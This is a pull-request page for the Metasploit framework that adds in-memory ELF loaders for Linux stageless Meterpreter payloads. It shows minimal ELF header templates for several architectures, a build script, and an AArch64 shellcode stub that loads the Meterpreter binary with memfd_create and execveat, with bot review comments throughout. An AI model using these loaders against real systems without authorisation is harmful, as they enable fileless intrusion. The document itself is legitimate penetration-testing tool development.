Fix Linux Stageless Payload to be Shellcodes #19799
Open
dledda-r7 wants to merge 61 commits into rapid7:master from dledda-r7:fix/mettle-stageless-payload
Commits (61; the changes shown below are from 53 of them)

0f7541f (dledda-r7) fix: removing unnecessary elf parsing in linux/x86/meterpreter
9f14e10 (dledda-r7) feat(payload): linux/x86 in_memory_loader for stageless meterpreter
5efa886 (dledda-r7) feat(payload): linux/x86 in_memory_loader itoa improvement
305e0d0 (dledda-r7) feat(payload): linux/x64 in_memory_loader for stageless meterpreter
69b4b2b (msutovsky-r7) Shellcode for memfd_create for ARM
226546b (msutovsky-r7) Armbe draft and ARM64 functional payload for memfd_create
e30386a (msutovsky-r7) Adding itoa for ARMle stageless payload
3217099 (msutovsky-r7) Adding itoa function for ARM64 and ARMbe
5908b87 (msutovsky-r7) Adding itoa function for ARM64 and ARMbe
1393a05 (dledda-r7) feat(payload): linux/mipsel in_memory_loader for stageless meterpreter
39e8ead (dledda-r7) feat(payload): linux/mips in_memory_loader for stageless meterpreter
0a4ca9f (dledda-r7) fix: move meterpreter_loader into separate mixin
27d011f (dledda-r7) fix: move x64 meterpreter_loader into separate mixin
e9779a1 (dledda-r7) fix: move mipsbe and mipsle meterpreter_loader into separate mixin
c7b9514 (msutovsky-r7) PPC64le init
862d2ba (msutovsky-r7) PPC64 shellcode added, adding PPC initial work
168865c (msutovsky-r7) PPC progress
2cea579 (msutovsky-r7) PowerPC stageless payload
4a04feb (dledda-r7) feat: add mips64 elf template and meterpreter_loader
97c04d1 (dledda-r7) fix: fix exe after merge issue
23459f7 (msutovsky-r7) ARMBe and Zarch stageless payload
26d59ca (msutovsky-r7) Code refactor, loader delivery update
711e3c4 (dledda-r7) fix: improved x86 and x64 shellcodes
50c402b (dledda-r7) fix: updated mettle payload generation and cached_size
fde9a93 (dledda-r7) fix: updated mettle payload generation and cached_size
1ab698a (msutovsky-r7) Fixed missing payload length for AARCH64
370124e (msutovsky-r7) Rubocoping AARCH64 payload modules
50b2d05 (msutovsky-r7) Aarch64 comments
3791e0e (msutovsky-r7) Add armbe/armle comments
4272db0 (dledda-r7) feat: add elf-legacy option for systems unsupported by in_memory_loader
3a8eac1 (msutovsky-r7) Adding comments for PPC
f9de30b (msutovsky-r7) Add build script
c317f4e (msutovsky-r7) Uses execveat syscall to make loader stub smaller
da89d6c (msutovsky-r7) Adds execveat for MIPS64, PPC64 and Zarch
394c01a (msutovsky-r7) Updates cached_sizes and rubocop
ff0bfcb (msutovsky-r7) Adds comments for ARM, Mips and PPC
96f83bf (msutovsky-r7) Adds comments for zarch
4a074ef (dledda-r7) fix: changing MeterpreterLegacyElf to MeterpreterLinuxMinKernel
47eea6f (dledda-r7) fix: including prepends mixin on linux stageless meterpreter
0c3103d (dledda-r7) fix: updating MeterpreterLinuxMinKernel default value, displaying war…
ec14ed0 (dledda-r7) fix: align assembly comments, add single build instructions
4c8e5ba (dledda-r7) chore: linting meterpreter_loader and prepends
1aaeba0 (msutovsky-r7) Adds convention for each architecture
bcb43ec (msutovsky-r7) Fixed comments
27f69bf (dledda-r7) fix: changes based on review comments
6e29b01 (msutovsky-r7) Fixing mipsbe loader stub
43b1677 (dledda-r7) fix: update cached size
07ff496 (dledda-r7) fix: update cached size
c3118cb (dledda-r7) fix: update cached size
38b63f5 (dledda-r7) chore: remove white-space
4cb91b7 (dledda-r7) Update lib/msf/core/payload/linux/mipsbe/prepends.rb
a27a0cb (dledda-r7) fix: update util/exe.rb to support new linux templates, code refactoring
7f5f264 (dledda-r7) Update modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb
dd8e5a3 (dledda-r7) Update modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb
a3106eb (dledda-r7) Update modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb
7e46f37 (dledda-r7) fix: minor fix linux elf templates
3b2a840 (dledda-r7) fix: removed + character in PayloadLinuxMinKernel
b42b7e8 (dledda-r7) fix: fix linux prepends, uniform ppc prepends
44b0917 (msutovsky-r7) Rolling back arm/arm64 to exec syscall
9bec2e3 (msutovsky-r7) Rolling back ppc/ppc64/ppce500v2 to exec syscall
8d29138 (msutovsky-r7) Rolling back zarch to exec syscall
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,8 @@ | ||
| #!/bin/sh | ||
|
|
||
| dst_folder="../../../" | ||
| for file in $(find ./ -name "*.s") | ||
| do | ||
| arch=`echo $file | cut -d "_" -f2`; | ||
| nasm -f bin $file -o $dst_folder"template_"$arch"_linux.bin" | ||
| done |
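Review bot: the loop `for file in $(find ./ -name "*.s")` word-splits the `find` output and then passes `$file` and the output path unquoted, and nothing stops the loop when `nasm` fails, so one broken template silently leaves a stale or missing `.bin` behind. Add `set -e`, quote the variables and iterate a glob, e.g. `for file in ./elf_*_template.s; do arch=$(echo "$file" | cut -d_ -f2); nasm -f bin "$file" -o "${dst_folder}template_${arch}_linux.bin"; done`. The `cut -d "_" -f2` step also depends on the `elf_<arch>_template.s` naming that the build comments in the templates use; a comment stating that convention, and that the script must be run from the templates directory because `dst_folder` is relative, would spare the next person a confusing failure.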
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,37 @@ | ||
| ; build with: | ||
| ; nasm elf_armbe_template.s -f bin -o template_armbe_linux.bin | ||
|
|
||
| BITS 32 | ||
| ehdr: ; Elf32_Ehdr | ||
| db 0x7F, "ELF", 1, 2, 1, 0 ; e_ident | ||
| db 0, 0, 0, 0, 0, 0, 0, 0 ; | ||
| dw 0x0200 ; e_type = ET_EXEC for an executable | ||
| dw 0x2800 ; e_machine = AARCH64 | ||
| dd 0x01000000 ; e_version | ||
| dd 0x54800000 ; e_entry | ||
| dd 0x34000000 ; e_phoff | ||
| dd 0 ; e_shoff | ||
| dd 0 ; e_flags | ||
| dw 0x3400 ; e_ehsize | ||
| dw 0x2000 ; e_phentsize | ||
| dw 0x0100 ; e_phnum | ||
| dw 0 ; e_shentsize | ||
| dw 0 ; e_shnum | ||
| dw 0 ; e_shstrndx | ||
|
|
||
| ehdrsize equ $ - ehdr | ||
|
|
||
| phdr: ; Elf32_Phdr | ||
|
|
||
| dd 0x01000000 ; p_type = pt_load | ||
| dd 0 ; p_offset | ||
| dd 0x00800000 ; p_vaddr | ||
| dd 0x00800000 ; p_paddr | ||
| dd 0xefbeadde ; p_filesz | ||
| dd 0xefbeadde ; p_memsz | ||
| dd 0x07000000 ; p_flags = rwx | ||
| dd 0x00100000 ; p_align | ||
|
|
||
| phdrsize equ $ - phdr | ||
|
|
||
| _start: | ||
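Review bot: the `e_machine = AARCH64` comment on `dw 0x2800` is wrong: read big-endian those bytes are 0x0028 = EM_ARM (40), which is exactly what a 32-bit big-endian ARM binary needs, so fix the comment before someone "corrects" the value. The byte-swapped literals (`0x54800000` for an e_entry of 0x8054, `0xefbeadde` for the 0xDEADBEEF size placeholder) are right but hard to audit by eye; the `WORD_BE`/`DWORD_BE` macros from the mips64 template would let this read `dw WORD_BE(40)` and `dd DWORD_BE(0xDEADBEEF)`. Note also that the placeholder bytes on disk here are DE AD BE EF, whereas the little-endian templates emit EF BE AD DE, so whatever patches the length must search for the per-template byte pattern and write the value in the matching byte order.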
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,55 @@ | ||
| ; build with: | ||
| ; nasm elf_mips64_template.s -f bin -o template_mips64_linux.bin | ||
|
|
||
| %define WORD_BE(value) (((value & 0xFF) << 8) | ((value >> 8) & 0xFF)) | ||
| %define DWORD_BE(dword) (((dword & 0xFF) << 24) | \ | ||
| ((dword & 0xFF00) << 8) | \ | ||
| ((dword >> 8) & 0xFF00) | \ | ||
| ((dword >> 24) & 0xFF)) | ||
| %define QWORD_BE(qword) ( \ | ||
| ((qword & 0x00000000000000FF) << 56) | \ | ||
| ((qword & 0x000000000000FF00) << 40) | \ | ||
| ((qword & 0x0000000000FF0000) << 24) | \ | ||
| ((qword & 0x00000000FF000000) << 8) | \ | ||
| ((qword >> 8) & 0x000000FF00000000) | \ | ||
| ((qword >> 24) & 0x0000FF0000000000) | \ | ||
| ((qword >> 40) & 0x00FF000000000000) | \ | ||
| ((qword >> 56) & 0xFF00000000000000) ) | ||
|
|
||
| BITS 64 | ||
|
|
||
| org 0x400000 | ||
| ehdr: ; Elf32_Ehdr | ||
| db 0x7F, "ELF", 2, 2, 1, 0 ; e_ident | ||
| db 0, 0, 0, 0, 0, 0, 0, 0 ; | ||
| dw WORD_BE(2) ; e_type = ET_EXEC for an executable | ||
| dw WORD_BE(0x08) ; e_machine = MIPS | ||
| dd 0 ; e_version | ||
| dq QWORD_BE(0x400078) ; e_entry | ||
| dq QWORD_BE(0x40) ; e_phoff | ||
| dq 0 ; e_shoff | ||
| dd 0 ; e_flags | ||
| dw WORD_BE(0x40) ; e_ehsize | ||
| dw WORD_BE(0x38) ; e_phentsize | ||
| dw WORD_BE(0x1) ; e_phnum | ||
| dw 0 ; e_shentsize | ||
| dw 0 ; e_shnum | ||
| dw 0 ; e_shstrndx | ||
|
|
||
| ehdrsize equ $ - ehdr | ||
|
|
||
| phdr: ; Elf32_Phdr | ||
| dd DWORD_BE(1) ; p_type = PT_LOAD | ||
| dd DWORD_BE(7) ; p_flags = rwx | ||
| dq 0 ; p_offset | ||
| dq QWORD_BE(0x400000) ; p_vaddr | ||
| dq QWORD_BE(0x400000) ; p_paddr | ||
| dq QWORD_BE(0xA00000) ; p_filesz | ||
| dq QWORD_BE(0xA00000) ; p_memsz | ||
| dq QWORD_BE(0x1000) ; p_align | ||
|
|
||
| phdrsize equ $ - phdr | ||
|
|
||
| global _start | ||
|
|
||
| _start: |
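Review bot: `p_filesz`/`p_memsz` are hard-coded to 0xA00000 (10 MiB) while every other template in this PR carries the 0xDEADBEEF placeholder; if the generator patches the placeholder with the real length this template is never patched, and if the fixed size is intentional (so the segment covers whatever is appended) that deserves a comment, since a payload larger than 10 MiB would not be fully mapped. Smaller points: `; Elf32_Ehdr` and `; Elf32_Phdr` should read `Elf64_Ehdr`/`Elf64_Phdr` (the fields are `dq` and `e_ehsize` is 0x40), `e_version` is 0 here while the other templates use 1, and `global _start` has no effect under `-f bin`.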
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,40 @@ | ||
| ; build with: | ||
|
||
| ; nasm elf_ppc64le_template.s -f bin -o template_ppc64le_linux.bin | ||
|
|
||
| BITS 64 | ||
|
|
||
| org 0x400000 | ||
|
|
||
| ehdr: ; Elf32_Ehdr | ||
| db 0x7F, "ELF", 2, 1, 1, 0 ; e_ident | ||
| db 0, 0, 0, 0, 0, 0, 0, 0 ; | ||
| dw 2 ; e_type = ET_EXEC for an executable | ||
| dw 0x15 ; e_machine = PowerPC | ||
| dd 0 ; e_version | ||
| dq _start ; e_entry | ||
| dq phdr - $$ ; e_phoff | ||
| dq 0 ; e_shoff | ||
| dd 0 ; e_flags | ||
| dw ehdrsize ; e_ehsize | ||
| dw phdrsize ; e_phentsize | ||
| dw 1 ; e_phnum | ||
| dw 0 ; e_shentsize | ||
| dw 0 ; e_shnum | ||
| dw 0 ; e_shstrndx | ||
|
|
||
| ehdrsize equ $ - ehdr | ||
|
|
||
| phdr: ; Elf32_Phdr | ||
| dd 1 ; p_type = PT_LOAD | ||
| dd 7 ; p_flags = rwx | ||
| dq 0 ; p_offset | ||
| dq $$ ; p_vaddr | ||
| dq $$ ; p_paddr | ||
| dq 0xDEADBEEF ; p_filesz | ||
| dq 0xDEADBEEF ; p_memsz | ||
| dq 0x1000 ; p_align | ||
|
|
||
| phdrsize equ $ - phdr | ||
|
|
||
| _start: | ||
| dq _start+0x8 | ||
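Review bot: the bare `dq _start+0x8` at `_start` needs a comment explaining what it is: with `e_flags` = 0 the kernel treats this as an ELFv1 binary and reads a function descriptor at `e_entry`, so this qword is the real entry address and the following qword, i.e. the first 8 bytes of the appended stub, is loaded into r2 as the TOC pointer. Either document that the stub must not rely on r2, or set the low two bits of `e_flags` to 2 (ELFv2) so `e_entry` can point straight at the code and the extra qword goes away. Also `; Elf32_Ehdr`/`; Elf32_Phdr` should read `Elf64_`, and `e_version` is 0 here while the big-endian templates use 1.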
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,37 @@ | ||
| ; build with: | ||
| ; nasm elf_ppc_template.s -f bin -o template_ppc_linux.bin | ||
|
|
||
| BITS 32 | ||
| ehdr: ; Elf32_Ehdr | ||
| db 0x7F, "ELF", 1, 2, 1, 0 ; e_ident | ||
| db 0, 0, 0, 0, 0, 0, 0, 0 ; | ||
| dw 0x0200 ; e_type = ET_EXEC for an executable | ||
| dw 0x1400 ; e_machine = AARCH64 | ||
| dd 0x01000000 ; e_version | ||
| dd 0x54100000 ; e_entry | ||
| dd 0x34000000 ; e_phoff | ||
| dd 0 ; e_shoff | ||
| dd 0 ; e_flags | ||
| dw 0x3400 ; e_ehsize | ||
| dw 0x2000 ; e_phentsize | ||
| dw 0x0100 ; e_phnum | ||
| dw 0 ; e_shentsize | ||
| dw 0 ; e_shnum | ||
| dw 0 ; e_shstrndx | ||
|
|
||
| ehdrsize equ $ - ehdr | ||
|
|
||
| phdr: ; Elf32_Phdr | ||
|
|
||
| dd 0x01000000 ; p_type = pt_load | ||
| dd 0 ; p_offset | ||
| dd 0x00100000 ; p_vaddr | ||
| dd 0x00100000 ; p_paddr | ||
| dd 0xefbeadde ; p_filesz | ||
| dd 0xefbeadde ; p_memsz | ||
| dd 0x07000000 ; p_flags = rwx | ||
| dd 0x00000100 ; p_align | ||
|
|
||
| phdrsize equ $ - phdr | ||
|
|
||
| _start: |
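Review bot: `p_vaddr`/`p_paddr` decode to 0x1000 (`dd 0x00100000` read big-endian) but `p_align` decodes to 0x10000 (`dd 0x00000100`), and the ELF spec requires p_vaddr to be congruent to p_offset modulo p_align; either the align value was meant to be `dd 0x00100000` (0x1000, as in the armbe template) or the load address should become 0x10000 with `e_entry` moved to 0x10054. The `e_machine = AARCH64` comment on `dw 0x1400` is also wrong: big-endian that is 0x0014 = EM_PPC (20).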
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,37 @@ | ||
| ; build with: | ||
| ; nasm elf_ppce500v2_template.s -f bin -o template_ppce500v2_linux.bin | ||
|
|
||
| BITS 32 | ||
| ehdr: ; Elf32_Ehdr | ||
| db 0x7F, "ELF", 1, 2, 1, 0 ; e_ident | ||
| db 0, 0, 0, 0, 0, 0, 0, 0 ; | ||
| dw 0x0200 ; e_type = ET_EXEC for an executable | ||
| dw 0x1400 ; e_machine = AARCH64 | ||
| dd 0x01000000 ; e_version | ||
| dd 0x54100000 ; e_entry | ||
| dd 0x34000000 ; e_phoff | ||
| dd 0 ; e_shoff | ||
| dd 0 ; e_flags | ||
| dw 0x3400 ; e_ehsize | ||
| dw 0x2000 ; e_phentsize | ||
| dw 0x0100 ; e_phnum | ||
| dw 0 ; e_shentsize | ||
| dw 0 ; e_shnum | ||
| dw 0 ; e_shstrndx | ||
|
|
||
| ehdrsize equ $ - ehdr | ||
|
|
||
| phdr: ; Elf32_Phdr | ||
|
|
||
| dd 0x01000000 ; p_type = pt_load | ||
| dd 0 ; p_offset | ||
| dd 0x00100000 ; p_vaddr | ||
| dd 0x00100000 ; p_paddr | ||
| dd 0xefbeadde ; p_filesz | ||
| dd 0xefbeadde ; p_memsz | ||
| dd 0x07000000 ; p_flags = rwx | ||
| dd 0x00000100 ; p_align | ||
|
|
||
| phdrsize equ $ - phdr | ||
|
|
||
| _start: |
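Review bot: this file is byte-for-byte identical to the ppc template apart from the build comment, so it inherits the same wrong `e_machine = AARCH64` comment (0x1400 is EM_PPC) and the same p_vaddr 0x1000 versus p_align 0x10000 mismatch. Consider having the build script assemble `template_ppce500v2_linux.bin` from `elf_ppc_template.s` rather than keeping a second copy that will drift, or add a comment explaining why the two must stay separate.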
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,34 @@ | ||
| ; build with: | ||
| ; nasm elf_zarch_template.s -f bin -o template_zarch_linux.bin | ||
|
|
||
| BITS 64 | ||
|
|
||
|
|
||
| ehdr: ; Elf32_Ehdr | ||
| db 0x7F, "ELF", 2, 2, 1, 0 ; e_ident | ||
| db 0, 0, 0, 0, 0, 0, 0, 0 ; | ||
| dw 0x0200 ; e_type = ET_EXEC for an executable | ||
| dw 0x1600 ; e_machine = PowerPC | ||
| dd 0x01000000 ; e_version | ||
| dq 0x7810000000000000 ; e_entry | ||
| dq 0x4000000000000000 ; e_phoff | ||
| dq 0 ; e_shoff | ||
| dd 0 ; e_flags | ||
| dw 0x4000 ; e_ehsize | ||
| dw 0x3800 ; e_phentsize | ||
| dw 0x0100 ; e_phnum | ||
| dw 0 ; e_shentsize | ||
| dw 0 ; e_shnum | ||
| dw 0 ; e_shstrndx | ||
|
|
||
| phdr: ; Elf32_Phdr | ||
| dd 0x01000000 ; p_type = PT_LOAD | ||
| dd 0x07000000 ; p_flags = rwx | ||
| dq 0 ; p_offset | ||
| dq 0x0010000000000000 ; p_vaddr | ||
| dq 0x0010000000000000 ; p_paddr | ||
| dq 0xDEADBEEF ; p_filesz | ||
| dq 0xDEADBEEF ; p_memsz | ||
| dq 0x0000100000000000 ; p_align | ||
|
|
||
| _start: |
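Review bot: `p_align` decodes to 0x100000 (1 MiB) while `p_vaddr` decodes to 0x1000 (`dq 0x0010000000000000`), so p_vaddr is not congruent to p_offset modulo p_align as the ELF spec requires; `dq 0x0010000000000000` (0x1000) was probably intended for `p_align` as well. The `e_machine = PowerPC` comment on `dw 0x1600` is wrong: big-endian that is 0x0016 = EM_S390 (22), and the `Elf32_Ehdr`/`Elf32_Phdr` comments should say `Elf64_`. Finally, `dq 0xDEADBEEF` in a big-endian file emits EF BE AD DE 00 00 00 00, which reads as 0xEFBEADDE00000000 rather than 0xDEADBEEF; the armbe template byte-swaps its placeholder, so a single byte-pattern search in util/exe.rb cannot match both files. Pick one placeholder encoding (or a BE macro) and make sure the patched length is written here as a big-endian qword.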
Six binary files not shown.
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,50 @@ | ||
| # | ||
| # In memory loader used to execute Mettle ELF file. | ||
| # Compatible with Kernel Linux >= 3.17 (where memfd_create is introduced) | ||
| # Author: Martin Sutovsky <martin_sutovsky[at]rapid7.com> | ||
| # Resource and Credits: https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html | ||
| # ARM64 conventions | ||
| # Parameters: x0-x7 | ||
| # Syscall offset: x8 | ||
| # Return Address for BL: x30 | ||
| # | ||
| module Msf::Payload::Linux::Aarch64::ElfLoader | ||
| def in_memory_load(payload) | ||
| in_memory_loader = [ | ||
| # fd = memfd_create(NULL,MFD_CLOEXEC) | ||
| 0x0a0080d2, # 0x1000: mov x10, #0 0x0a0080d2 | ||
| 0xea0300f9, # 0x1004: str x10, [sp] 0xea0300f9 | ||
| 0xe0030091, # 0x1008: mov x0, sp 0xe0030091 | ||
| 0x210080d2, # 0x100c: mov x1, #1 0x210080d2 | ||
| 0xe82280d2, # 0x1010: mov x8, #0x117 0xe82280d2 | ||
| 0x010000d4, # 0x1014: svc #0 0x010000d4 | ||
| 0xe90300aa, # 0x1018: mov x9, x0 0xe90300aa | ||
|
|
||
| # jump to 0x105c | ||
| 0x10000014, # 0x101c: b #0x105c 0x10000014 | ||
|
|
||
| # write(fd, payload length, payload pointer) | ||
| 0xea031eaa, # 0x1020: mov x10, x30 0xea031eaa | ||
| 0x420140b9, # 0x1024: ldr w2, [x10] 0x420140b9 | ||
| 0x4a110091, # 0x1028: add x10, x10, #4 0x4a110091 | ||
| 0xe1030aaa, # 0x102c: mov x1, x10 0xe1030aaa | ||
| 0x080880d2, # 0x1030: mov x8, #0x40 0x080880d2 | ||
| 0x010000d4, # 0x1034: svc #0 0x010000d4 | ||
|
|
||
| # execveat(fd, null,null,null, AT_EMPTY_PATH) | ||
| 0xe00309aa, # 0x1038: mov x0, x9 0xe00309aa | ||
| 0x0a0080d2, # 0x103c: mov x10, #0 0x0a0080d2 | ||
| 0xea0300f9, # 0x1040: str x10, [sp] 0xea0300f9 | ||
| 0xe1030091, # 0x1044: mov x1, sp 0xe1030091 | ||
| 0x020080d2, # 0x1048: mov x2, #0 0x020080d2 | ||
| 0x030080d2, # 0x104c: mov x3, #0 0x030080d2 | ||
| 0x040082d2, # 0x1050: mov x4, #0x1000 0x040082d2 | ||
| 0x282380d2, # 0x1054: mov x8, #0x119 0x282380d2 | ||
| 0x010000d4, # 0x1058: svc #0 0x010000d4 | ||
|
|
||
| # jump back to 0x1020, the address right after this instruction will be stored in x30 | ||
| 0xf1ffff97, # 0x105c: bl #0x1020 0xf1ffff97 | ||
| ].pack('N*') | ||
| in_memory_loader + [payload.length].pack('V*') | ||
| end | ||
| end |
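Review bot: the header says `Compatible with Kernel Linux >= 3.17 (where memfd_create is introduced)` but the stub ends with `mov x8, #0x119` / `svc #0`, i.e. execveat, which only exists from Linux 3.19; state the real minimum and keep it in sync with the `Rolling back arm/arm64 to exec syscall` commit later in this PR, which changes it again. The stub also never checks the memfd_create result: on a kernel without the syscall x0 holds -ENOSYS and the code goes on to `write` and `execveat` on that value instead of failing cleanly, which matters because MeterpreterLinuxMinKernel exists precisely for such targets; a `tbnz x0, #63, <exit>` after the first `svc #0` costs one instruction. Two readability points: the comment `write(fd, payload length, payload pointer)` has the arguments reversed (x1 is the pointer, x2 the length), and encoding every instruction as its byte-swapped value and packing with `'N*'` makes the opcodes impossible to check against a disassembler, whereas `[0xd280000a, ...].pack('V*')` yields the same bytes from the natural encodings. Also, memfd_create is called with a pointer to an empty string on the stack, not NULL as the comment says (NULL would return -EFAULT).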